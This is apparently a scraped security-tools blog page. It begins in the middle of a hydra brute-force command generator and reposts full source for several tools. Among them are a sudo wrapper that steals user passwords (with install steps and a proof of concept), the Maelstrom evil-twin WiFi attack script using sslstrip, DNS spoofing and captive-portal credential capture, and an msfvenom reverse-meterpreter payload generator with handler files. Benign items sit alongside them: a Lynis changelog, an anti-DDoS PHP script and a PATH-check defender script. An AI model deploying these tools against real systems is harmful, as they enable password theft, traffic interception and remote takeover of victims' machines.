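        cmd = "hydra -L %s -P %s -s %d -t %d -e ns" % (user_file, pass_file, port, threads)
        if module.endswith("-head"):
            cmd += " -m /"                      # request path for the http(s)-head module
        commands.append("%s %s %s" % (cmd, addr, module))
    return commands, unhandled


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_XML
    cmds, skipped = hydra_plan(data)
    for c in cmds:
        print(c)
    for port, proto, name in skipped:
        print("# no hydra module for %d/%s (%s)" % (port, proto, name))
```

The script only emits the commands; review them before piping to sh. Open ports whose service has no hydra module (rpcbind, SNMP on UDP) are reported separately instead of being silently dropped, which is what the per-port grep does.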

Download all Script, Wordlist: Master.zip  | Clone Url
Source : https://github.com/1N3

Updates Lynis v-2.1.0 : is a system and security auditing tool for Unix/Linux.


Changelog v-2.1.0:

General:
--------
Screen output has been improved to provide additional information.

OS support:
-----------
CUPS detection on Mac OS has been improved. AIX systems now use the csum utility to create the host ID. The group check on AIX has been altered to include -n ALL. The core dump check on Linux is extended to check the actual values as well.

Software:
---------
McAfee detection has been extended by detecting a running cma binary. Detection of the pf firewall on BSD and Mac OS has been improved. Security patch checking with zypper has been extended.

Session timeout:
----------------
Tests to determine the shell timeout setting have been extended to account for AIX, HP-UX and other platforms. They now also determine whether the variable is exported as a read-only variable. The related compliance section PCI DSS 8.1.8 has been extended.

Lynis is a system and security auditing tool for Unix/Linux. The main audience of this tool is security consultants, auditors and system administrators. It performs a security audit of the system and determines how well it is hardened. Any detected security issues are reported as a suggestion or warning at the end of the audit. Besides security-related information it also collects general system information, installed packages and possible configuration errors. The software aims to assist with automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read-only storage is possible (USB stick, CD/DVD).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits by automating control testing.

Features :
+ System auditing
+ Hardening suggestions
+ Security scan
+ Vulnerability scan

Download : lynis-2.1.0.tar.gz (180.5 kB)
Source : https://cisofy.com/
Our Post Before : http://seclist.us/updates-lynis-v-1-6-4-is-a-system-and-security-auditing-tool-for-unixlinux.html

mod_wallz and Web-Firewall Released.


mod_wallz is an Apache module to mitigate Layer 7 DDoS attacks.
Web-Firewall is a firewall project for mitigating HTTP Layer 7 DDoS attacks through PHP.
PHP script for Web-Firewall:

<?php
/* Layer 7 HTTP GET DDoS protection script */
/* Prerequisites: iptables, PHP, Apache, openssl */
	$CFAK = "scrubbed"; // Cloudflare API Key
	$CFEMAIL= "scrubbed"; // Cloudflare Email
	$TTL = 3600; // Time in seconds for the challenge TTL; 1 hour is the default
	if(empty($_SERVER['HTTP_CF_IPCOUNTRY'])){
		$CLOUDFLARE= false;
	}else{
		$CLOUDFLARE= true;
	}
	function ban($ip){
		global $CFAK, $CFEMAIL, $CLOUDFLARE;
		if(!$CLOUDFLARE){return false;}
		$url = 'https://www.cloudflare.com/api_json.html';
		$f = array(
			'a' => "ban",
			'tkn' => $CFAK,
			'email' => $CFEMAIL,
			"key" => $ip
		);
		// http_build_query() URL-encodes each field; the original hand-rolled loop did not
		$fs = http_build_query($f);
		$ch = curl_init();
		curl_setopt($ch,CURLOPT_URL, $url);
		curl_setopt($ch,CURLOPT_POST, true);
		curl_setopt($ch,CURLOPT_POSTFIELDS, $fs);
		curl_setopt($ch,CURLOPT_RETURNTRANSFER, true); // return the response instead of printing it
		$r = curl_exec($ch);
		curl_close($ch);
		return $r;
	}
	function kill($m=1){
		ban($_SERVER['REMOTE_ADDR']);
		header("HTTP/1.0 403 Forbidden");
		echo "You have been denied.";
		die();
	}
	function checkLegit(){
		// PHP_SELF can carry attacker-supplied path info, so escape it before embedding it in the page
		$self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
		// NOTE: the server-side handlers for the _wf and _wf_ACK requests are not part of the published snippet
		echo '<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script><script>
		function getCookie(cname) {
			var name = cname + "=";
			var ca = document.cookie.split(";");
			for (var i = 0; i < ca.length; i++) {
				var c = ca[i];
				while (c.charAt(0) == " ") c = c.substring(1);
				if (c.indexOf(name) === 0) return c.substring(name.length, c.length);
			}
			return "";
		}
		$.get("'.$self.'?_wf=" + getCookie("wf_ini"), function (d) {
			$("#token").text(d);
			$.get("'.$self.'?_wf_ACK=" + $("#token").text(), function (r) {
				if(r == "Ok"){
					alert("Press Ok to continue...");
					location.reload();
				}else{
					$("#token").text("Failed bot challenge......");
				}
			});
		});
		</script><div id="tkn_hdr">Token:</div><div id="token">[Nothing]</div>';
		$CID = bin2hex(openssl_random_pseudo_bytes(16)); // 32 hex characters
		$now = time();
		setcookie("wf_ini",$CID.$now,$now+10);
		// parentheses needed: "." and "+" share precedence, so $CID.time()+10 was evaluated as a number
		file_put_contents("/tmp/_wf.id",$_SERVER['REMOTE_ADDR']."&".$CID.($now+10)."\n",FILE_APPEND);
		die();
	}
	function verCookie(){
		global $TTL;
		$cookie = isset($_COOKIE['wf_twl']) ? $_COOKIE['wf_twl'] : '';
		// whitelist lines have the form ip:token:unix_timestamp, one client per line
		$lines = @file("/tmp/_wf.wl", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
		$tokenSeen = false;
		foreach((array)$lines as $line){
			list($ip, $cid, $ts) = array_pad(explode(":", $line, 3), 3, '');
			// hash_equals() (PHP >= 5.6) compares the tokens in constant time
			if($cookie === '' || !hash_equals($cid, $cookie)){ continue; }
			$tokenSeen = true;
			if($ip === $_SERVER['REMOTE_ADDR'] && (time() - (int)$ts) <= $TTL){
				return true;
			}
		}
		if($tokenSeen){
			// known token presented from another address (or expired): clear it without banning
			setcookie("wf_twl",'',1);
			echo "Different-origin violation. This incidence has been forgiven.";
			die();
		}
		setcookie("wf_twl",'',1);
		ban($_SERVER['REMOTE_ADDR']);
		die();
	}
	function setwfCookie(){
		global $TTL;
		$CID = bin2hex(openssl_random_pseudo_bytes(16));
		setcookie("wf_twl",$CID,time()+$TTL);
		// append, so entries for other clients are kept
		file_put_contents("/tmp/_wf.wl",$_SERVER['REMOTE_ADDR'].":".$CID.":".time()."\n",FILE_APPEND);
	}
	setwfCookie();
	var_dump(verCookie());

install.sh Script:

#!/bin/bash
echo "Beta code-upload means unless you know how to re-make this installation script, you won't be able to install this."
## THIS REPO IS CURRENTLY USED TO BACKUP MY CODE, NOT PUBLISHING.
## MAN, do not install this for now, this is highly likely to ruin your server (and your day) since its still pretty much Pre-Alpha, it's not even working.
## Alternatively, if you want to fuck your server up, uncomment the line below.
#apxs -i -a -c mod_wallz.c

wallz.conf Script:

LoadModule wallz_module modules/mod_wallz.so
<IfModule mod_wallz.c>
# Nullis in derpis
</IfModule>

mod_wallz.c Script :

#include "httpd.h"
#include "http_core.h"
#include "http_config.h"
#include "http_log.h"
#include "http_request.h"

/* The published module registers no hooks yet; this placeholder lets it compile and load. */
static void register_hooks(apr_pool_t *p)
{
    (void)p;
}

/* Module record. The per-directory/per-server config callbacks and the
 * directive table named in the original are not part of the published code,
 * so they are left NULL here, which Apache accepts. */
module AP_MODULE_DECLARE_DATA wallz_module =
{
    STANDARD20_MODULE_STUFF,
    NULL,            /* create per-directory config */
    NULL,            /* merge per-directory config */
    NULL,            /* create per-server config */
    NULL,            /* merge per-server config */
    NULL,            /* command table (directives) */
    register_hooks
};

Source : https://github.com/LolDatSec

Sudo-Backdoor : Wrapper to sudo for stealing user Password.


Wrapper to sudo; prompts regularly but steals the user's password. For those annoying times when you get a "non-privileged" sudo-enabled shell.
Installation:
1. Append the following line to the target user's .bashrc file by running the following command:
$ echo "export PATH=~/.payload:$PATH" >> ~/.bashrc
2. Then create ~/.payload/sudo and paste the following code into the file. Don't forget to make the bash script executable by issuing the following command:
$ chmod a+x ~/.payload/sudo
3. Obviously you might have to adapt this installation recipe to fit the user's shell. If they are using zsh, then install to ~/.zshrc, etc.

Proof of concept: foobar is the target with password `foobarz1`
[foobar:~]$ tail -n 1 ~/.bashrc
export PATH=~/.payload:$PATH
[foobar:~]$ ls -la ~/.payload/sudo 
-rwxr-xr-x 1 foobar foobar 420 Aug 16 01:21 /home/foobar/.payload/sudo
[foobar:~]$ sudo id
[sudo] password for foobar: [inserted wrong password `barbaz` here as proof of concept]
Sorry, try again.
[sudo] password for foobar: [inserted `foobarz1` here]
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
[foobar:~]$ cat /tmp/.ICE-unix-test 
foobar:barbaz:invalid
foobar:foobarz1:valid
[foobar:~]$ sudo id [the system remembers previous authentification]
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)

Bash Script:

#!/bin/bash
/usr/bin/sudo -n true 2>/dev/null
if [ $? -eq 0 ]
then
    /usr/bin/sudo $@
else
    echo -n "[sudo] password for $USER: "
    read -s pwd
    echo
    echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
    if [ $? -eq 1 ]
    then
	echo "$USER:$pwd:invalid" >> /tmp/.ICE-unix-test
	echo "Sorry, try again."
	sudo $@
    else
	echo "$USER:$pwd:valid" >> /tmp/.ICE-unix-test
	echo "$pwd" | /usr/bin/sudo -S $@
    fi
fi

Source :https://github.com/ldionmarcil
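The wrapper above only works because a user-writable directory sits in front of /usr/bin in PATH and an rc file puts it there. The following defender-side checks for both conditions are an added example, not part of the original post; they assume nothing beyond POSIX sh and the usual rc file names.

```shell
#!/bin/sh
# Added example (not part of the original post): defensive checks for the
# two things a sudo wrapper relies on, a directory placed ahead of the
# system directories in PATH, and a PATH prepend planted in a shell rc file.
# Plain POSIX sh string handling, so it runs offline.

# Print every PATH entry that precedes the first system directory
# (/usr/bin, /bin, /usr/sbin, /sbin). Returns 0 if any such entry exists,
# 1 if the system directories come first. An empty entry means the current
# directory and is reported as such.
path_entries_before_system() {
    rest="$1:"                       # trailing ':' so the last entry is consumed
    found=1
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        case "$dir" in
            /usr/bin|/bin|/usr/sbin|/sbin) break ;;
            "") printf '%s\n' '<empty entry = current directory>'; found=0 ;;
            *)  printf '%s\n' "$dir"; found=0 ;;
        esac
    done
    return $found
}

# Print the file that "sudo" resolves to under the given PATH, the way the
# shell does it (first executable wins); print nothing and return 1 if none.
first_sudo_in_path() {
    rest="$1:"
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        [ -n "$dir" ] || dir="."
        if [ -f "$dir/sudo" ] && [ -x "$dir/sudo" ]; then
            printf '%s\n' "$dir/sudo"
            return 0
        fi
    done
    return 1
}

# Return 0 if "sudo" resolves to the expected system binary
# (default /usr/bin/sudo), 1 if it resolves to a wrapper or to nothing.
sudo_is_genuine() {
    expected="${2:-/usr/bin/sudo}"
    actual="$(first_sudo_in_path "$1")" || actual=""
    [ "$actual" = "$expected" ]
}

# Print (with line numbers) every line of a shell rc file that puts a
# directory in front of $PATH, e.g. 'export PATH=~/.payload:$PATH'.
# Appends such as PATH=$PATH:~/bin are not reported.
rc_path_prepends() {
    grep -nE 'PATH=[^=]*:\$\{?PATH' "$1"
}

# Report on the current environment when run directly.
echo "PATH entries ahead of the system directories:"
path_entries_before_system "$PATH" || echo "  (none)"
echo "sudo resolves to: $(first_sudo_in_path "$PATH" || echo 'not found')"
for rc in "$HOME/.bashrc" "$HOME/.zshrc" "$HOME/.profile"; do
    [ -f "$rc" ] && rc_path_prepends "$rc" | sed "s|^|$rc:|"
done
```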

Maelstrom – Bash Script for WiFi Vector Attack.


WiFi vector attack for Kali NetHunter.
With Options :
1. Perform EvilAP
2. Perform accespoint-soft
3. Perform accespoint-ssl
4. Perform accespoint-captive-portal
5. Perform urlsnarf
6. Perform driftnet
7. Perform tails dhcp
8. Perform tails sslstrip
9. Perform tails Captive Portal

Maelstrom.sh Script:

#!/bin/bash

#author : Armaal
#year : 2015
#info : wifi vector attack for kali nethunter

f_interface(){
clear
echo "Maelstrom";

echo -e "\e[93mAutomated scripties\e[0m"
echo -e "\e[4mChose your flavor:\e[24m"
echo -e "\e[34mRun EvilAP [1] in first!\e[0m"
echo
echo "1. Perform EvilAP "
echo "--- - --- - --- - ---"
echo "2. Perform accespoint-soft "
echo "3. Perform accespoint-ssl "
echo "4. Perform accespoint-captive-portal  "
echo "--- - --- - --- - ---"
echo "5. Perform urlsnarf  "
echo "6. Perform driftnet "
echo "--- - --- - --- - ---"
echo "7. Perform tails dhcp "
echo "8. Perform tails sslstrip "
echo "9. Perform tails Captive Portal "

echo
echo -e "\e[34mDon't forget to use tails.sh\e[0m"
echo
read -p "Choice: " interfacechoice
echo

  case $interfacechoice in
    1) f_evilap ;;
	2) f_accespoint-soft ;;
	3) f_accespoint-ssl ;;
	4) f_accespoint-dnspoof-captive ;;
    	5) f_urlsnarf ;;
	6) f_driftnet;;
	7) f_dhcp;;
	8) f_ssl;;
	9) f_captive ;;
  esac
}
echo
echo
f_accespoint-soft(){

#cleanning iptable
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

#start to set rules on iptable based on the dhcpd.conf
ifconfig at0 up
ifconfig at0 192.168.7.1 netmask 255.255.255.0
route add -net 192.168.7.0 netmask 255.255.255.0 gw 192.168.7.1
pkill dhcpd
/etc/init.d/isc-dhcp-server start

#active router mod and configure some iptable
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
}

f_accespoint-ssl (){

#cleanning iptable
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

#Start to set rules on iptables based on the dhcpd.conf
ifconfig at0 up
ifconfig at0 192.168.7.1 netmask 255.255.255.0
route add -net 192.168.7.0 netmask 255.255.255.0 gw 192.168.7.1
pkill dhcpd
/etc/init.d/isc-dhcp-server start

#Iptable rules
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888
#Launch ssltrip with log
echo
echo -e "\e[34mLogs saved to /sdcard/capture/ssl/\e[0m"
logfile=/sdcard/capture/ssl/sslstrip_$(date +%F-%H%M).log
echo
echo -e "\e[35m*When you have finish the sslstrip (ctrl-C to escape)\e[0m"
echo -e "\e[35m*You will be able to see the result in this terminal\e[0m"
cd /opt/pwnpad/sslstrip
python sslstrip.py -pfk -l 8888 -w $logfile
echo
echo -e "\e[96mLook at the results :\e[0m"
echo
tail -f $logfile
}

f_accespoint-dnspoof-captive(){

#cleanning iptable
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

#Start to set rules on iptables based on the dhcpd.conf
ifconfig at0 up
ifconfig at0 192.168.7.1 netmask 255.255.255.0
route add -net 192.168.7.0 netmask 255.255.255.0 gw 192.168.7.1

#iptable rules
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

#put the wlan0 ip
echo -e "\e[34mGet a grep on wlan0\e[0m"
echo -e "\e[34mcopy your wlan0 IP\e[0m"
ifconfig wlan0 | grep "inet " | awk -F'[: ]+' '{ print $4 }'
echo
read -p "Enter wlan0 local ip ->" iplocal

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $iplocal:80
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $iplocal:80
iptables -t nat -A POSTROUTING -j MASQUERADE
pkill dhcpd
echo -e "\e[31mDHCP-server start\e[0m"
/etc/init.d/isc-dhcp-server start
sleep 2s
service apache2 restart
sleep 1s
echo -e "\e[31mSpoofing DNS\e[0m"
echo -e "\e[34mLogs saved to /sdcard/capture/dnspoof/\e[0m"
screen -dmS dnsspoof dnsspoof -i at0 -f /usr/local/hosts
}

#DRIFTNET#
clear
echo
f_driftnet(){

   echo -e "\e[93mdriftnet with verbose\e[0m"
   driftnet -v -i at0
}

#URLSNARF#
clear
echo
f_urlsnarf(){

   echo -e "\e[93mLogs saved to /sdcard/capture/urlsnarf/\e[0m"
   urlsnarf -i at0 >> /sdcard/capture/urlsnarf/urlsnarf_$(date +%F-%H%M).log
}

#EVILAP#
clear
echo
f_evilap(){

#change the hostname and mac address randomly
echo -e "\e[35mRolling MAC address and Hostname randomly to make you more difficult to find\e[0m"
ifconfig wlan1 down
macchanger -r wlan1
echo
echo -e "\e[35mYour new local mac adress:\e[0m"
hn=`ifconfig wlan1 |grep HWaddr |awk '{print$5}' |awk -F":" '{print$1$2$3$4$5$6}'`
hostname $hn
echo $hn
echo
echo -e " \e[44mLet's GO\e[0m"
echo -e "\e[31mStop previous mon0\e[0m"
airmon-ng stop mon0

#Put wlan1 into monitor mode - mon0 created
echo -e "\e[31mcreating the new mon0 from wlan1\e[0m"
echo
airmon-ng start wlan1
echo -e "\e[92mIt's Ok\e[0m"
clear

#airbase-ng#
echo -e "\e[96mSet up EvilAP in Bad Karma\e[0m"
echo
echo -e "\e[93mtarget the channel of the router\e[0m"
echo -e "\e[93mtarget the name of the router\e[0m"
echo
read -p "Enter the Wi-Fi [AP Channel] : " channel
read -p "Enter the Wi-Fi [ESSID] : " essid
clear
echo
echo -e "\e[93mLogs saved to /sdcard/capture/evilap/\e[0m"
echo -e "\e[34mEvilAP is running in background\e[0m"
screen -dmS karma airbase-ng -P -C 60 -y -e $essid -c $channel -v wlan1mon 
}

#TAILS CAPTIVE_PORTAL#
echo
f_captive(){
clear
echo -e " \e[44mCaptive Portal Tail\e[0m"
tail -f /var/www/"$wwwdir"/"formdata.txt"
}
#TAILS DHCP LEASE#
echo
f_dhcp(){
clear
echo -e " \e[44mDHCP Tail Lease\e[0m"
#cleanning any pre-existing dhcp lease
echo > /var/lib/dhcp/dhcpd.leases
cat /dev/null > /tmp/dhcpd.conf
sleep 1s
tail -f /var/lib/dhcp/dhcpd.leases 2> /dev/null | grep --color -E "lease|hardware|client"
}
#TAILS SSLTRIP LOG#
echo
f_ssl(){
clear
echo -e " \e[44mSSL Tail filtering mail extension\e[0m"
echo
tail -f /opt/maelstrom/ssllog.txt | grep -E 'orange.fr|gmail.com|free.fr|hotmail.fr|hotmail.com'
}

#RUN INTERFACE#
f_run(){
  f_interface 
  }
 
f_run

Update.sh:

#!/bin/bash

echo -e "\e[93mUpdate the script\e[0m"
git pull
echo -e "\e[93mdone\e[0m"

Source : https://github.com/Armaal


Msfvenom Payload Creator (MPC).


Msfvenom Payload Creator (MPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible (requiring only one input) to produce the payload.
Fully automating Msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, a quick web server, etc.).
The only necessary input from the user should be the payload they want, defined either by platform (e.g. windows) or by the file extension they want the payload to have (e.g. exe).

Quickly generate Metasploit payloads using msfvenom.


Install:
Designed for Kali Linux 1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help :

root@kali:/var/www# bash /root/mpc.sh
 [*] Msfvenom Payload Creator (MPC)

 [i] Missing type

 [i] /root/mpc.sh <TYPE> (<IP>) (<PORT>)
 [i] TYPE:
 [i]   + ASP (meterpreter)
 [i]   + Bash (meterpreter)
 [i]   + Linux (meterpreter)
 [i]   + PHP (meterpreter)
 [i]   + Python (meterpreter)
 [i]   + Windows (meterpreter)
 [i] IP will default to IP selection menu
 [i] PORT will default to 443
root@kali:/var/www#

Example :

Example #1 (PHP - Fully Automated)
root@kali:/var/www# bash /root/mpc.sh php 127.0.0.1
 [*] Msfvenom Payload Creator (MPC)
 [i]   IP: 127.0.0.1
 [i] PORT: 443
 [i] TYPE: PHP (php/meterpreter_reverse_tcp)
 [i]  CMD: msfvenom --payload php/meterpreter_reverse_tcp --format raw --platform php --arch php LHOST=127.0.0.1 LPORT=443 -o /var/www/php_meterpreter.php
No encoder or badchars specified, outputting raw payload
Saved as: /var/www/php_meterpreter.php
 [i] PHP meterpreter created as '/var/www/php_meterpreter.php'
 [i] MSF handler file create as 'php_meterpreter.rc (msfconsole -q -r /var/www/php_meterpreter.rc)'
 [?] Quick web server?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:/var/www#

Example #2 (Windows - Interactive)
root@kali:/var/www# bash /root/mpc.sh exe
 [*] Msfvenom Payload Creator (MPC)

 [i] Use which IP address?:
 [i]   1.) 192.168.103.136
 [i]   2.) 192.168.155.175
 [i]   3.) 127.0.0.1
 [?] Select 1-3: 2

 [i]   IP: 192.168.155.175
 [i] PORT: 443
 [i] TYPE: Windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom --payload windows/meterpreter/reverse_tcp --format exe --platform windows --arch x86 LHOST=192.168.155.175 LPORT=443 -o /var/www/windows_meterpreter.exe
No encoder or badchars specified, outputting raw payload
Saved as: /var/www/windows_meterpreter.exe
 [i] Windows meterpreter created as '/var/www/windows_meterpreter.exe'
 [i] MSF handler file create as 'windows_meterpreter.rc (msfconsole -q -r /var/www/windows_meterpreter.rc)'
 [?] Quick web server?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:/var/www#

To-Do List:
– Display interface name next to IP address (e.g. 2.) 192.168.155.175 [eth1])
– Display file stats (e.g. file, size, md5/sha1) Commands are in, just commented out.
– Cleaner command line arguments (e.g. -ip 127.0.0.1, -v etc)
– Support different payloads (e.g. standard shells/nc & reverse_http/reverse_https, bind etc)
– x64 payloads

Script.sh :

#!/bin/bash
#-Metadata----------------------------------------------------#
#  Filename: mpc.sh                      (Update: 2015-06-22) #
#-Info--------------------------------------------------------#
#  Quickly generate Metasploit payloads using msfvenom.       #
#-Author(s)---------------------------------------------------#
#  g0tmilk ~ https://blog.g0tmi1k.com/                        #
#-Operating System--------------------------------------------#
#  Designed for: Kali Linux & Metasploit v4.11+               #
#-Licence-----------------------------------------------------#
#  MIT License ~ http://opensource.org/licenses/MIT           #
#-Notes-------------------------------------------------------#
#                             ---                             #
#-------------------------------------------------------------#


#-Defaults-------------------------------------------------------------#


outputPath="$(pwd)/"     # ./  /var/www/   /tmp/

##### (Cosmetic) Colour output
RED="\033[01;31m"
GREEN="\033[01;32m"
YELLOW="\033[01;33m"
BLUE="\033[01;34m"
RESET="\033[00m"

##### Read command line arguments
TYPE="$(echo ${1} | tr '[:upper:]' '[:lower:]')"
IP="${2}"
PORT="${3}"
[[ -z "${IP}" ]] && IP=( $(ifconfig | grep inet | \grep -E '([[:digit:]]{1,2}.){4}' | sed 's/://g; s/inet//g; s/addr//g; s/^[ \t]*//' | cut -d ' ' -f1) )
[[ -z "${PORT}" ]] && PORT="443"
SUCCESS=false

##### (Optional) Enable debug mode?
#set -x


#-Function-------------------------------------------------------------#

## doAction TYPE IP PORT PAYLOAD CMD FILEEXT
function doAction {
  TYPE="${1}"
  IP="${2}"
  PORT="${3}"
  PAYLOAD="${4}"
  CMD="${5}"
  FILEEXT="${6}"

  FILENAME="$(echo ${TYPE}_meterpreter.${FILEEXT} | tr '[:upper:]' '[:lower:]')"
  FILEHANDLE="$(echo ${TYPE}_meterpreter.rc | tr '[:upper:]' '[:lower:]')"

  echo -e " ${YELLOW}[i]${RESET}   IP: ${YELLOW}${IP}${RESET}"
  echo -e " ${YELLOW}[i]${RESET} PORT: ${YELLOW}${PORT}${RESET}"
  echo -e " ${YELLOW}[i]${RESET} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})"
  echo -e " ${YELLOW}[i]${RESET}  CMD: ${YELLOW}${CMD}${RESET}"

  [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. Overwriting..."
  eval "${CMD}"

  #echo -e " ${YELLOW}[i]${RESET}  File: $(file -b ${FILENAME})"
  #echo -e " ${YELLOW}[i]${RESET}  Size: $(du -h ${FILENAME} | cut -f1)"
  #echo -e " ${YELLOW}[i]${RESET}   MD5: $(md5sum ${FILENAME} | awk '{print $1}')"
  #echo -e " ${YELLOW}[i]${RESET}  SHA1: $(sha1sum ${FILENAME} | awk '{print $1}')"

  cat <<EOF > "${FILEHANDLE}"
#
# RUN:   service postgresql start; service metasploit start; msfconsole -q -r "${FILENAME}"
#
setg TimestampOutput true
setg VERBOSE true
use exploit/multi/handler
set PAYLOAD ${PAYLOAD}
set LHOST ${IP}
set LPORT ${PORT}
set AutoRunScript "migrate -f"
set ExitOnSession false
exploit -j -z
EOF
  echo -e " ${YELLOW}[i]${RESET} ${TYPE} meterpreter created as '${YELLOW}${outputPath}${FILENAME}${RESET}'"
  echo -e " ${YELLOW}[i]${RESET} MSF handler file create as '${YELLOW}${FILEHANDLE}${RESET} (msfconsole -q -r $(pwd)/${FILEHANDLE})'"
  SUCCESS=true
  return
}


#-Start----------------------------------------------------------------#


## Banner
echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET})"


## IP selection menu
if [[ -n "${1}" ]] && [[ -z "${2}" ]]; then
  echo -e "\n ${YELLOW}[i]${RESET} Use which ${YELLOW}IP address${RESET}?:"
  _I=0
  for ip in "${IP[@]}"; do
    _I=$[${_I} +1]
    echo -e " ${YELLOW}[i]${RESET}   ${GREEN}${_I}${RESET}.) ${ip}"
  done
  while true; do
    echo -ne " ${YELLOW}[?]${RESET} ${GREEN}Select${RESET} 1-${#IP[@]}"; read -p ": " INPUT
    [[ "${INPUT}" -ge 1 ]] && [[ "${INPUT}" -le "${#IP[@]}" ]] && IP=${IP[${INPUT}-1]} && break
  done
  echo ""
fi

## ASP
if [[ "${TYPE}" == "asp" ]]; then
  TYPE="windows"
  FILEEXT="asp"
  PAYLOAD="${TYPE}/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format asp --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "ASP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Bash
elif [[ "${TYPE}" == "bash" ]] || [[ "${TYPE}" == "sh" ]]; then
  TYPE="bash"
  FILEEXT=".sh"
  PAYLOAD="cmd/unix/reverse_bash"
  CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "PHP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Linux
elif [[ "${TYPE}" == "linux" ]] || [[ "${TYPE}" == "lin" ]] || [[ "${TYPE}" == "elf" ]]; then
  TYPE="linux"
  FILEEXT="bin"
  PAYLOAD="${TYPE}/x86/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format elf --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "Linux" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## PHP
elif [[ "${TYPE}" == "php" ]]; then
  TYPE="php"
  FILEEXT="php"
  PAYLOAD="${TYPE}/meterpreter_reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "PHP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Python
elif [[ "${TYPE}" == "python" ]] || [[ "${TYPE}" == "py" ]]; then
  TYPE="python"
  FILEEXT="py"
  PAYLOAD="${TYPE}/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "Python" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
## Windows
elif [[ "${TYPE}" == "windows" ]] || [[ "${TYPE}" == "win" ]] || [[ "${TYPE}" == "exe" ]]; then
  TYPE="windows"
  FILEEXT="exe"
  PAYLOAD="${TYPE}/meterpreter/reverse_tcp"
  CMD="msfvenom --payload ${PAYLOAD} --format exe --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
  doAction "Windows" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
elif [[ -z "${TYPE}" ]]; then
  echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}"
else
  echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}"
fi

if [[ "$SUCCESS" = true ]]; then
  echo -e " ${GREEN}[?]${RESET} Quick ${GREEN}web server${RESET}?   python -m SimpleHTTPServer 8080"
  echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!"
  exit 0
else
  echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} <TYPE> (<IP>) (<PORT>)"
  echo -e " ${YELLOW}[i]${RESET} TYPE:"
